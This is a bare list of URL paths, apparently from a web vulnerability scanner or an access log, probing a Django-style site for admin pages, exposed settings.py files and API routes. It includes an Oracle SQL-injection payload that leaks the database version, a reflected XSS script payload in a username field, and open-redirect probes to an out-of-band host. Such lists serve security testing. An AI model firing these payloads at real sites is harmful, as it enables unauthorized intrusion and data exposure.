/admin/login/?next=/admin/
/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1
/settings.py
/app/settings.py
/django/settings.py
/settings/settings.py
/web/settings/settings.py
//www.example.com
/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
//www.interact.sh
/NON_EXISTING_PATH/
/v1/a
/v2/a
/v3/a
/v4/a
/v5/a
/api/a
/api/v1/a
/api/v2/a
/api/v3/a
/api/v4/a
/v1/api/a
/v2/api/a
/v3/api/a
/v4/api/a
/1/a
/2/a
/3/a
/4/a
